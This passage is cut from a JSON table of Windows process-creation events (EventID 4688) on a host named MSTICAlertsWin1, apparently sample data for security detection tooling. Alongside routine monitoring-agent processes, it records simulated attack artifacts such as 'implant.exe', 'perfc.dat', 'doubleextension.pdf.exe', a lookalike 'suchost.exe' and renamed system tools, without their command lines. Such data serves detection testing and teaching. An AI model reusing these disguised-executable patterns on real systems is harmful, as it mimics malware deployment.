\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\